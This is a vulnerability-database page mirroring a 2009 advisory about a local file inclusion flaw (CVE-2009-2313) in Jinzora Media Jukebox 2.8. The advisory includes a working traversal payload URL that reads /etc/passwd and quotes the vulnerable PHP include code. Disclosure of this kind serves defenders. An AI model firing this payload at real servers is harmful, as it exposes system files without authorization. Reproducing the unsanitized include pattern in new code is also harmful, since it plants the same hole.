Lucene search
+L

Jinzora Media Jukebox 2.8 - 'name' Local File Inclusion

🗓️ 24 Mar 2009 00:00:00Reported by dunType 
exploitdb
 exploitdb
🔗 www.exploit-db.com👁 55 Views

Jinzora Media Jukebox 2.8 - 'name' Local File Inclusio

Related
Code
ReporterTitlePublishedViews
Family
circl
Circl
CVE-2009-2313
24 Mar 200900:00
circl
cve
CVE
CVE-2009-2313
2 Jul 200910:00
cve
cvelist
Cvelist
CVE-2009-2313
2 Jul 200910:00
cvelist
euvd
EUVD
EUVD-2009-2309
7 Oct 202500:30
euvd
nessus
Tenable Nessus
Jinzora name Parameter Local File Inclusion
7 Apr 200900:00
nessus
nvd
NVD
CVE-2009-2313
2 Jul 200910:30
nvd
prion
Prion
Directory traversal
2 Jul 200910:30
prion
  :::::::-.   ...    ::::::.    :::.
   ;;,   `';, ;;     ;;;`;;;;,  `;;;
   `[[     [[[['     [[[  [[[[[. '[[
    $$,    $$$$      $$$  $$$ "Y$c$$
    888_,o8P'88    .d888  888    Y88
    MMMMP"`   "YmmMMMM""  MMM     YM

   [ Discovered by dun \ dun[at]strcpy.pl ]

 ##########################################################################
 #  [ Jinzora Media Jukebox <= 2.8 ]  Local File Inclusion Vulnerability  #
 ##########################################################################
 #
 # Script site: http://jinzora.com/ ,  http://sourceforge.net/projects/jinzora/
 # Download: http://downloads.sourceforge.net/jinzora/jz280.tar.gz?use_mirror=freefr
 #
 # Vuln: http://site.com/jinzora2/index.php?op=1&name=../../../../../../etc/passwd%00
 #
 # Bug: ./jinzora2/index.php (lines: 36-47, 95)
 #
 # ...
 #	$include_path = ""; $link_root = ""; $cms_type = "standalone"; $cms_mode = "false";
 # $backend = ""; $jz_lang_file = ""; $skin = ""; $my_frontend = "";
 #
 #	if (isset($_GET['op'])){							// (1)
 #		// This has got to be postnuke...
 #		$include_path = "modules/". $_GET['name']. "/";				// (2)
 #		$link_root = "modules.php?";
 #		$cms_type = "postnuke";
 #		$cms_mode = "true";
 #	} else if (isset($_GET['name']) and !isset($_GET['op'])){
 #		// This has got to be phpnuke
 #		$include_path = "modules/". $_GET['name']. "/";
 # ...
 #
 # 	@include($include_path. 'settings.php'); 					// (3) LFI
 # ...
 #
 #
 ###############################################
 # Greetz: mama * tata * str0ke * and otherz..
 ###############################################

 [ dun / 2009 ]

*******************************************************************************************

# milw0rm.com [2009-03-24]

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

24 Mar 2009 00:00Current
5.8Medium risk
Vulners AI Score5.8
CVSS 27.5
EPSS0.02392
55